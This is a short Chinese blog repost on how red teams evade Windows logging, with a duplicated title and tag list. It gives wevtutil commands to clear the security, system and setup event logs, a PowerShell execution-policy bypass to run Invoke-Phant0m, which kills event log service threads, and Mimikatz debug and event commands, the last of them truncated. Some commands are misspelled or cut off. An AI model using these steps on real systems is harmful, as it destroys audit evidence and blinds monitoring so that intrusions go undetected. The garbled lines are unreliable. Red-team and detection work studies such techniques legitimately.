红队绕过日志检查

标签：nts   containe   debug   ant   ati   contain   eve   github   日志   

• 命令：wevtutil cl 日志类型

   wevtutil cl security
   wevtutil cl Setup
   wevtutil cl System
   wevtutil cl Aplication
   wevtutil cl Forwarded Events

• 使用Phantom 工具

  该脚本遍历事件日志服务进程（特定于svchost.exe）的线程堆栈，并标识事件日志线程以杀死事件日志服务线程。因此，系统将无法收集日志，同时，事件日志服务也正在运行。

   github：https://github.com/hlldz/Invoke-Phant0m

  1 powershell -ep bypass
  2  .\Invoke-Phant0m.ps1

• Mimikatz

  1 privilege::debug
  2  event::

   

红队绕过日志检查

标签：nts   containe   debug   ant   ati   contain   eve   github   日志   

原文地址：https://www.cnblogs.com/ashell/p/14932665.html